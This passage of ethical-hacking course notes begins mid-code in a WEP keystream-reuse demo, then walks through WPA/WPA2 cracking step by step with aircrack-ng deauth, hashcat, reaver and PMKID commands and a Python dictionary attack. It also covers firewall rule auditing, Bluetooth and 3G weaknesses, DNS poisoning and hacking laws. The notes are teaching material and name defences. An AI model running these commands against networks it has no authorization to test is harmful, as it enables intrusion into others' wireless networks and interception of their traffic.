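    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def rc4(key, data):
    """RC4 encryption and decryption are the same XOR with the keystream."""
    return xor_bytes(data, rc4_keystream(key, len(data)))


def wep_encrypt(shared_key, iv, plaintext):
    """WEP per-packet key = IV (3 bytes, transmitted in the clear) || shared key.
    A real frame also carries a CRC-32 ICV over the plaintext; omitted here."""
    assert len(iv) == 3
    return iv, rc4(iv + shared_key, plaintext)


def recover_from_iv_reuse(shared_key, iv, known_plaintext, secret_plaintext):
    """Two frames under the same IV share a keystream, so C1 XOR C2 = P1 XOR P2.
    When P1 is predictable (ARP and DHCP headers are), P2 falls out without the key.
    The function encrypts both frames itself only to produce the two ciphertexts an
    attacker would have sniffed; the recovery step uses nothing but those and P1."""
    _, c1 = wep_encrypt(shared_key, iv, known_plaintext)
    _, c2 = wep_encrypt(shared_key, iv, secret_plaintext)
    return xor_bytes(xor_bytes(c1, c2), known_plaintext)


def frames_until_iv_repeat(p=0.5):
    """Birthday bound for a 24-bit IV: frames needed for probability p of a repeat."""
    return math.sqrt(2 * 2**24 * math.log(1 / (1 - p)))   # about 4823 for p = 0.5


KEY_104 = bytes.fromhex("0102030405060708090a0b0c0d")   # constructed 104-bit WEP key
IV = b"\x00\x00\x01"                                      # constructed 24-bit IV

if __name__ == "__main__":
    print("RC4 test vector:", rc4(b"Key", b"Plaintext").hex())
    print("recovered:", recover_from_iv_reuse(KEY_104, IV, b"known ARP header", b"secret payload!!"))
    print("frames for a 50% IV collision:", round(frames_until_iv_repeat()))
```

About five thousand frames already give even odds of one IV collision; aircrack-ng's PTW attack goes further and recovers the key itself from tens of thousands of frames, but keystream reuse alone is enough to read traffic, which is why no key length fixes WEP.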


💥 Cracking WPA / WPA2 (Wi-Fi Protected Access)
🔎 How WPA/WPA2 Works
●​ WPA/WPA2 uses a 4-way handshake to verify the client and router.​

●​ WPA2-PSK (Pre-Shared Key) is most common in home networks.​

●​ Vulnerable to password-based attacks if a weak passphrase is used.​

🛠 WPA/WPA2 Cracking Process (Handshake Capture)

1.​ Enable Monitor Mode: airmon-ng start wlan0​

2.​ Scan Networks: airodump-ng wlan0mon​

3.​ Capture Handshake: airodump-ng --bssid [BSSID] -c [channel] -w capture wlan0mon​

4.​ Force Handshake (Deauth): aireplay-ng --deauth 5 -a [BSSID] -c [client MAC] wlan0mon (the client reconnects and its 4-way handshake is captured)​

5.​ Verify Handshake in .cap file: aircrack-ng capture.cap

🛠 Cracking the Captured Handshake


Method 1: Dictionary Attack (Aircrack-ng)

aircrack-ng -w wordlist.txt -b [BSSID] capture.cap

●​ Depends on the quality of the wordlist.​

●​ Can fail if the password is complex.​

Method 2: Mask / Brute Force (Hashcat)

hcxpcapngtool -o capture.hc22000 capture.cap
hashcat -m 22000 -a 3 capture.hc22000 ?d?d?d?d?d?d?d?d

●​ Mode 22000 takes the .hc22000 format, which holds either an EAPOL handshake or a PMKID; the older .hccapx format belongs to the now-deprecated mode 2500.​

●​ The mask above tries every 8-digit numeric passphrase. GPU acceleration makes short or low-entropy passphrases feasible, but each guess still costs the full 4096-round PBKDF2 derivation.​

🔎 WPA/WPA2 Vulnerabilities
●​ Weak Passphrase: Human-chosen passwords are often guessable; every offline attack above depends on this.​

●​ WPS Attack (Reaver): the WPS PIN is validated in two halves, so an online brute force needs at most about 11,000 attempts instead of 10^8:​
reaver -i wlan0mon -b [BSSID] -c [channel] -vv

●​ PMKID Attack (WPA2): the AP's first EAPOL message can carry a PMKID derived from the PMK, so a crackable hash is obtained from one association attempt, without any connected client:​
hcxdumptool -i wlan0mon -o dump.pcapng --enable_status=1

Convert to Hashcat: hcxpcapngtool -o capture.hc22000 dump.pcapng
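What aircrack-ng and hashcat actually compute for each guess is small enough to write out. The added Python example below (not from the original notes) derives the WPA2 PMK from a passphrase and SSID exactly as IEEE 802.11i specifies, computes the PMKID that the PMKID attack captures, and runs a dictionary attack against it. The SSID and passphrase come from the standard's published test vector; the MAC addresses and wordlist are constructed.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), per IEEE 802.11i.
    This is the work aircrack-ng and hashcat -m 22000 repeat for every candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk, ap_mac, sta_mac):
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || station MAC).
    The AP sends it in message 1 of the 4-way handshake, which is why the PMKID attack
    needs no connected client: one association attempt yields a crackable value."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def dictionary_attack(target_pmkid, ssid, ap_mac, sta_mac, wordlist):
    """Offline guessing: derive the PMK for each candidate and compare PMKIDs. The cost
    per guess is fixed by the 4096 PBKDF2 rounds, so only passphrase entropy limits it."""
    for candidate in wordlist:
        guess = pmkid(wpa2_pmk(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, target_pmkid):
            return candidate
    return None


# Constructed capture: SSID and passphrase from the 802.11i test vector, MACs made up.
SSID = "IEEE"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
CAPTURED_PMKID = pmkid(wpa2_pmk("password", SSID), AP_MAC, STA_MAC)  # what hcxdumptool would record
WORDLIST = ["letmein", "qwerty123", "summer2024", "password", "dragon"]

if __name__ == "__main__":
    print("PMK for 'password' on 'IEEE':", wpa2_pmk("password", SSID).hex())
    print("dictionary attack recovered:", dictionary_attack(CAPTURED_PMKID, SSID, AP_MAC, STA_MAC, WORDLIST))
```

Two things follow directly from the code: the SSID acts as the salt, so rainbow tables only work per SSID (which is why default SSIDs are a liability), and nothing about the handshake can be tuned on the AP to make guessing slower; a long random passphrase or WPA3 is the only fix.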

🔥 WPA3 Note (Latest Standard)


●​ Uses Simultaneous Authentication of Equals (SAE), the Dragonfly handshake: the PMK comes from an interactive password-authenticated key exchange rather than directly from the passphrase.​

●​ A captured exchange therefore cannot be brute-forced offline; each guess requires a live attempt against the AP, which can be rate-limited.​

●​ Currently difficult to crack unless poorly configured (e.g., WPA2/WPA3 transition mode, where the WPA2 side still exposes the passphrase to the attacks above) or vulnerable implementations (the Dragonblood side-channel flaws) are in use.

🚀 Defensive Measures Against Cracking


●​ Use WPA3 if possible.​

●​ Strong, complex passphrase.​

●​ Disable WPS.​

●​ Use VLANs or guest networks for IoT devices.​

●​ Regularly monitor your network for rogue access points or unknown clients.

🧠 Conclusion
| Protocol | Status |
|---|---|
| WEP | Easily crackable; avoid completely |
| WPA | Deprecated (TKIP); weak to dictionary attacks if the passphrase is bad |
| WPA2 | Still secure if the passphrase is strong and WPS is disabled |
| WPA3 | Strongest, but not yet universally deployed |

As an Ethical Hacker, these methods should be used only for penetration testing with
permission to secure networks by finding weaknesses and fixing them.

Chapter 5:

1. Safer Tools and Services in Cyber Security & Ethical Hacking


These tools help ethical hackers and security experts identify vulnerabilities, monitor networks,
and ensure safety.

Categories of Tools:

| Tool Type | Examples | Use |
|---|---|---|
| Vulnerability Scanners | Nessus, OpenVAS | Scanning systems for vulnerabilities |
| Penetration Testing Tools | Metasploit, Burp Suite | Simulating attacks to find weak spots |
| Network Monitoring Tools | Wireshark, Nmap | Capturing and analyzing network traffic; mapping hosts and services |
| Password Cracking Tools | John the Ripper, Hashcat | Testing password strength and cracking hashes |
| Forensics Tools | Autopsy, FTK | Analyzing digital evidence post-breach |
| Encryption Tools | VeraCrypt, GnuPG | Encrypting sensitive data |
| SIEM Tools | Splunk, QRadar | Real-time monitoring and analysis of logs/events |

🔥 2. Firewalls in Cyber Security


Firewalls are the first line of defense—designed to filter incoming and outgoing traffic based on
predetermined rules.

Types of Firewalls:

| Type | Description | Example |
|---|---|---|
| Packet Filtering | Examines packets against rule sets (addresses, ports, protocol) | Cisco ACLs |
| Stateful Inspection | Tracks connection states, so only replies to established sessions are admitted | Check Point |
| Proxy Firewalls | Acts as an intermediary that terminates and re-originates connections | Squid Proxy |
| Next-Gen Firewall (NGFW) | Adds IDS/IPS, SSL/TLS inspection and application awareness | Palo Alto, Fortinet |
| Web Application Firewall (WAF) | Protects web apps from attacks like XSS, SQLi | Cloudflare, AWS WAF |

Key Functions:

●​ Block/allow traffic​

●​ Monitor traffic behavior​


●​ Prevent malware infiltration​

●​ Enforce security policies

🔎 3. Filtering Services
Filtering services are additional protective layers, specifically targeting types of content or data
streams.

Types of Filtering:

| Type | Purpose | Examples |
|---|---|---|
| URL/Content Filtering | Blocks malicious or inappropriate sites | Websense, Barracuda |
| DNS Filtering | Filters DNS queries to malicious domains | OpenDNS, Quad9 |
| Email Filtering | Blocks spam, phishing, malware emails | Mimecast, Proofpoint |
| Data Loss Prevention (DLP) | Prevents sensitive data leaks | Symantec DLP |

🛠️ 4. Firewall Engineering (Design & Best Practices)


Firewall engineering involves proper configuration, placement, and hardening of firewall
systems.

Core Steps:
1.​ Define Security Policy — Identify acceptable use, services, and traffic flow.​

2.​ Design Network Architecture:​

○​ DMZ (Demilitarized Zone) for public services (web/email servers)​

○​ Internal Networks for sensitive resources​

3.​ Rule Set Design: Principle of least privilege—only necessary ports/services are allowed.​

4.​ Redundancy & High Availability: Failover configurations​

5.​ Regular Updates & Patch Management​

6.​ Logging & Monitoring: Ensure every action is logged for auditing​

7.​ Penetration Testing the Firewall: Validate rules and configurations against simulated
attacks
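Steps 3 and 7 above (least-privilege rule sets, then testing them) are where most firewall mistakes live: rules are evaluated first match wins, so a broad "allow" placed too early silently shadows every narrower "deny" after it. The added Python example below (not from the original notes) evaluates a rule set with first-match semantics and an implicit default deny, and audits it for shadowed rules. The address plan (internet, a DMZ with one web server, an internal LAN) and both rule sets are constructed for the demo.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str              # "allow" or "deny"
    src: str                 # source CIDR
    dst: str                 # destination CIDR
    port: Optional[int]      # destination TCP port, None = any
    comment: str = ""


def _net(cidr):
    return ipaddress.ip_network(cidr, strict=False)


def matches(rule, src_ip, dst_ip, port):
    return (ipaddress.ip_address(src_ip) in _net(rule.src)
            and ipaddress.ip_address(dst_ip) in _net(rule.dst)
            and (rule.port is None or rule.port == port))


def decide(rules, src_ip, dst_ip, port):
    """First matching rule wins; an implicit deny sits at the end (least privilege)."""
    for rule in rules:
        if matches(rule, src_ip, dst_ip, port):
            return rule.action, rule.comment
    return "deny", "implicit default deny"


def shadowed(rules):
    """Rules that can never fire because an earlier rule already covers their whole match
    space. A shadowed deny is the classic audit finding: the policy reads as if the hole
    were closed while the firewall never gets to that line."""
    out = []
    for i, rule in enumerate(rules):
        for earlier in rules[:i]:
            if (_net(rule.src).subnet_of(_net(earlier.src))
                    and _net(rule.dst).subnet_of(_net(earlier.dst))
                    and (earlier.port is None or earlier.port == rule.port)):
                out.append((rule.comment, earlier.comment))
                break
    return out


ANY, DMZ, LAN = "0.0.0.0/0", "192.0.2.0/24", "10.0.0.0/8"   # constructed address plan
WEB = "192.0.2.10/32"                                        # the DMZ web server

GOOD_RULES = [
    Rule("allow", ANY, WEB, 443, "internet -> DMZ web server, HTTPS only"),
    Rule("allow", LAN, ANY, None, "LAN may initiate outbound"),
    Rule("deny", DMZ, LAN, None, "a compromised DMZ host must not pivot inward"),
]

BAD_RULES = [
    Rule("allow", ANY, DMZ, None, "temporary: open the whole DMZ"),       # too broad, and first
    Rule("deny", ANY, DMZ, 22, "no SSH into the DMZ from the internet"),   # shadowed: never fires
    Rule("allow", LAN, ANY, None, "LAN may initiate outbound"),
]

if __name__ == "__main__":
    print("good, SSH from internet to web server:", decide(GOOD_RULES, "203.0.113.9", "192.0.2.10", 22))
    print("bad,  SSH from internet to web server:", decide(BAD_RULES, "203.0.113.9", "192.0.2.10", 22))
    print("shadowed rules in bad set:", shadowed(BAD_RULES))
```

The same two checks (simulate decisions for the flows the policy is supposed to block, and look for shadowing) are what a firewall penetration test automates against the exported rule base before any packets are sent; the simulation here ignores direction-of-reply and protocol for brevity, which a stateful firewall tracks.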

📡 5. Secure Communications Over Insecure Networks


The goal is to prevent eavesdropping, tampering, and man-in-the-middle (MITM) attacks.

Techniques & Protocols:

| Method | Description | Example Tools/Protocols |
|---|---|---|
| VPN (Virtual Private Network) | Creates an encrypted tunnel over public networks | OpenVPN, IPSec, WireGuard |
| SSH (Secure Shell) | Encrypts remote login sessions | PuTTY, OpenSSH |
| TLS/SSL | Secure website communication | HTTPS |
| IPSec | Secure IP communication, used in VPNs | |
| End-to-End Encryption (E2EE) | Only sender and receiver can read messages | Signal, WhatsApp |
| TLS for Email | Secures SMTP/IMAP/POP3 | STARTTLS |
| Zero Trust Model | Never trust, always verify, even inside the network | |

Best Practices:

●​ Use strong encryption algorithms (AES-256, RSA-2048+)​

●​ Mutual authentication​

●​ Regular certificate management​

●​ Implement perfect forward secrecy (PFS)

✅ Conclusion
In Cyber Security & Ethical Hacking, mastering these layers of defense and tools ensures:

●​ Strong network perimeter security​

●​ Data integrity and confidentiality​

●​ Resilience against attacks​

●​ Compliance with security standards like ISO 27001, PCI DSS, GDPR​
Case Study: Mobile Hacking - Bluetooth and 3G Network Weaknesses
🔎 Introduction
With the growth of mobile technology, smartphones have become integral to our daily lives,
carrying sensitive personal and financial data. However, mobile communication channels like
Bluetooth and 3G networks have historically been targeted by hackers due to various
vulnerabilities.

1️⃣ Bluetooth Weaknesses and Exploitation


🔐 Overview of Bluetooth Technology
●​ Short-range wireless technology for communication between devices.​

●​ Operating range: 10-100 meters.​

●​ Common uses: file sharing, hands-free calls, IoT device pairing, and more.​

⚠ Bluetooth Security Weaknesses


| Vulnerability | Description |
|---|---|
| Bluejacking | Sending unsolicited messages to nearby Bluetooth-enabled devices. Harmless but intrusive. |
| Bluesnarfing | Unauthorized access to information (contacts, SMS, photos) via Bluetooth. Exploits poor access control. |
| Bluebugging | Taking full control of the victim's phone via a hidden Bluetooth connection. Enables call interception, message sending, and eavesdropping. |
| Car Whisperer | Exploiting Bluetooth car kits that ship with fixed default passkeys (such as 0000 or 1234) to inject or record audio. |
| Bluetooth Impersonation (BIAS) | Attacker impersonates a previously paired device and gains unauthorized access. |
🛠 Tools Used in Bluetooth Hacking
●​ Bluesnarf​

●​ BlueBugger​

●​ BTScanner​

●​ hciconfig & hcitool (Linux utilities)​

●​ Ubertooth One (for advanced Bluetooth sniffing)​

📌 Real-World Example
"BlueBorne" (2017)

●​ A set of critical Bluetooth vulnerabilities allowing attackers to take control of devices without user interaction or pairing.​

●​ Affected billions of devices (Android, Windows, Linux, iOS).​

●​ Result: Remote code execution and potential full device compromise.

2️⃣ 3G Network Weaknesses and Exploitation


📶 Overview of 3G Technology
●​ Third Generation of mobile telecommunications.​

●​ Introduced better data rates, mobile internet, and enhanced encryption over 2G.​

⚠ 3G Security Weaknesses
| Vulnerability | Description |
|---|---|
| Downgrade Attacks | Forcing a phone from 3G down to 2G (weaker or no encryption) for easier interception; IMSI catchers commonly do this. |
| IMSI Catchers (Stingrays) | Fake base stations trick phones into connecting, revealing user identity (IMSI) and location. |
| Man-in-the-Middle (MitM) | Intercepting communication by relaying data between the mobile and a real base station. |
| Lack of End-to-End Encryption | Traffic is encrypted only over the air between the phone and the network; inside the operator's core network it is in the clear. |
| SS7 Protocol Vulnerabilities | SS7 predates mobile networks (it is the PSTN signalling protocol) and is still used by 2G/3G for roaming; its trust-every-operator model enables location tracking, call interception, and SMS hijacking. |

🛠 Tools and Devices for Exploitation


●​ IMSI Catchers / Stingray​

●​ OpenBTS / YateBTS (Fake base stations)​

●​ Software Defined Radios (SDR)​

●​ SS7 Testing Tools​

📌 Real-World Example
"SS7 Exploits"

●​ Attackers used SS7 flaws to:​

○​ Track phone locations globally.​

○​ Intercept calls and SMS (e.g., banking OTPs).​

○​ Redirect calls/SMS for espionage.

✅ Defensive Measures in Cybersecurity


| Attack Vector | Mitigation |
|---|---|
| Bluetooth | Disable Bluetooth when not in use; use "non-discoverable" mode; update firmware to patch vulnerabilities; avoid pairing with unknown devices. |
| 3G Networks | Use VPNs for secure communication; upgrade to 4G/5G where possible (stronger encryption and mutual authentication); use apps with end-to-end encryption (Signal, WhatsApp); be aware of likely IMSI catcher zones. |

🤖 Role of Ethical Hacking


🧠 Why Ethical Hacking Matters Here
●​ Penetration testers use these vulnerabilities in controlled environments to:​

○​ Test corporate mobile devices.​

○​ Audit network security of telecom infrastructure.​

○​ Educate users about safe mobile practices.​

●​ Tools like SDRs and Bluetooth sniffers help simulate real-world attacks.

🔮 Conclusion
Mobile hacking through Bluetooth and 3G network weaknesses remains a critical threat in
cybersecurity. Despite the phase-out of 3G, legacy vulnerabilities persist, especially in less
developed regions. Ethical hackers play a vital role in identifying, testing, and mitigating these
weaknesses to protect users, data, and mobile infrastructures.

💻 Suggested Tools & Frameworks for Further Study


●​ Kali Linux / Parrot OS (For mobile and wireless pen-testing)​

●​ Ubertooth One (Bluetooth sniffing)​

●​ OpenBTS / YateBTS (Mobile network research)​

●​ Wireshark / Scapy (Packet analysis)​

●​ SDR Tools (HackRF, RTL-SDR) (Signal interception)​


Case Study: DNS Poisoning (DNS Spoofing)
📌 What is DNS Poisoning?
DNS Poisoning or DNS Spoofing is a cyber attack in which corrupted DNS data is inserted into
the DNS resolver’s cache, causing the DNS server to return an incorrect IP address. This
redirects users to malicious websites without their knowledge.

📌 How Does DNS Poisoning Work?


●​ DNS servers store domain-to-IP mappings.​

●​ In DNS Poisoning, the attacker intercepts or forges DNS responses.​

●​ The attacker injects fake data (malicious IP) into the cache.​

●​ When users try to visit legitimate websites, they’re redirected to fake, harmful websites
(e.g., phishing, malware).​

📌 Real-World Example: The 2010 DNS Cache Poisoning Attack


●​ Attackers poisoned DNS caches of several ISPs.​

●​ Users visiting popular sites like Facebook or Gmail were redirected to fake versions of
these sites.​

●​ Attackers stole sensitive data like login credentials and banking information.​

📌 Impacts of DNS Poisoning


✅ Phishing Attacks​
✅ Malware Distribution​
✅ Data Theft (credentials, banking info)​
✅ Network Disruption
📌 Detection and Prevention
| Detection | Prevention |
|---|---|
| Monitor DNS traffic for unexpected answers and sudden changes in cached records | Implement DNSSEC (DNS Security Extensions) |
| Compare responses from multiple DNS servers | Use reputable DNS resolvers |
| Use intrusion detection systems | Regular DNS server patching and updates (modern resolvers randomize source ports and transaction IDs, which makes blind poisoning impractical) |
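To see why a resolver's checks matter, the following added Python example (not from the original notes, and a toy rather than a real resolver) caches a reply only if its transaction ID and destination port match the outstanding query, and applies the bailiwick rule so that extra records are cached only when they belong to the zone that was asked about. It then runs an off-path attacker that sprays all 65,536 transaction IDs at a resolver that always queries from port 53 (the pre-2008 behaviour) and at one that randomizes its source port. Names, addresses and the RNG seed are constructed.

```python
import random


class ToyResolver:
    """Minimal caching resolver showing three checks that decide whether a forged reply is
    cached: transaction ID match, source-port match, and the bailiwick rule. fixed_port=53
    reproduces old resolvers that sent every query from the same port."""

    def __init__(self, seed=7, fixed_port=None):
        self.rng = random.Random(seed)
        self.fixed_port = fixed_port
        self.pending = {}   # name -> (txid, src_port) of the outstanding query
        self.cache = {}     # name -> ip

    def send_query(self, name):
        txid = self.rng.randrange(1 << 16)                         # 16-bit transaction ID
        port = self.fixed_port or self.rng.randrange(1024, 1 << 16)  # 16 more bits if random
        self.pending[name] = (txid, port)
        return txid, port

    def receive(self, name, txid, dst_port, answer_ip, additional=()):
        """A reply is accepted only if txid and destination port match the open query."""
        if self.pending.get(name) != (txid, dst_port):
            return "dropped"
        del self.pending[name]
        self.cache[name] = answer_ip
        zone = name.split(".", 1)[1]                               # www.example.com -> example.com
        for extra_name, extra_ip in additional:
            if extra_name == zone or extra_name.endswith("." + zone):
                self.cache[extra_name] = extra_ip                  # in bailiwick: glue is cached
            # anything outside the queried zone (e.g. www.bank.com) is ignored
        return "cached"


def blind_spray(resolver, name, assumed_port=53, rogue_ip="6.6.6.6"):
    """Off-path attacker: cannot see the query, so it sprays every txid at the port it
    assumes the resolver used. Returns True if any forged reply got cached."""
    resolver.send_query(name)
    return any(resolver.receive(name, txid, assumed_port, rogue_ip) == "cached"
               for txid in range(1 << 16))


def bailiwick_demo():
    """An on-path attacker who matched txid and port still cannot plant an unrelated name."""
    r = ToyResolver()
    txid, port = r.send_query("www.example.com")
    r.receive("www.example.com", txid, port, "93.184.216.34",
              additional=[("ns1.example.com", "192.0.2.53"), ("www.bank.com", "6.6.6.6")])
    return r.cache


if __name__ == "__main__":
    print("fixed port 53 poisoned:", blind_spray(ToyResolver(fixed_port=53), "www.example.com"))
    print("random port poisoned:  ", blind_spray(ToyResolver(), "www.example.com"))
    print("cache after bailiwick check:", bailiwick_demo())
```

Port randomization raises the blind attacker's search from 2^16 to roughly 2^32 guesses per query, which is what the 2008 resolver patches added; DNSSEC goes further by letting the resolver verify the answer's signature, so even a reply that matches every field is rejected if it was not signed by the zone.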

⚖️ Hacking Laws in Cyber Security and Ethical Hacking


📌 What is Ethical Hacking?
Ethical hacking involves legally breaking into computers and devices to test an organization’s
defenses. It's done by professionals known as white-hat hackers who help improve security.

📌 Important International Hacking Laws


| Country/Region | Law/Act | Description |
|---|---|---|
| USA | Computer Fraud and Abuse Act (CFAA) | Criminalizes unauthorized access to computers. |
| India | Information Technology Act, 2000 (IT Act) | Covers hacking, data theft, cyber terrorism, and phishing. |
| EU | General Data Protection Regulation (GDPR) | Regulates data protection and privacy; breaches lead to fines and penalties. |
| UK | Computer Misuse Act 1990 | Addresses hacking, unauthorized access, and denial-of-service attacks. |

📌 Key Offenses in Hacking Laws


✅ Unauthorized access to computers/networks​
✅ Data theft or data breach​
✅ Identity theft and phishing​
✅ Malware distribution​
✅ Cyber terrorism
📌 Penalties for Hacking (General Examples)
| Offense | Possible Punishment |
|---|---|
| Data Theft | 3-7 years imprisonment + fine |
| Unauthorized Access | 3-5 years imprisonment + fine |
| Cyber Terrorism | Life imprisonment |
| Financial Fraud via Hacking | Heavy fines + jail time depending on the amount |

👨‍💻 Legal Framework for Ethical Hackers

Ethical hacking is legal only when:

●​ There is written permission from the organization.​

●​ It follows the defined scope and rules of engagement.​

●​ The hacker reports vulnerabilities responsibly.

Unauthorized hacking, even with good intentions, is illegal under most laws.

📌 Conclusion
DNS Poisoning is a serious cyber attack with far-reaching consequences. Laws worldwide
recognize the severity of hacking and impose strict penalties. However, ethical hacking — done
legally — plays a crucial role in protecting cyberspace.
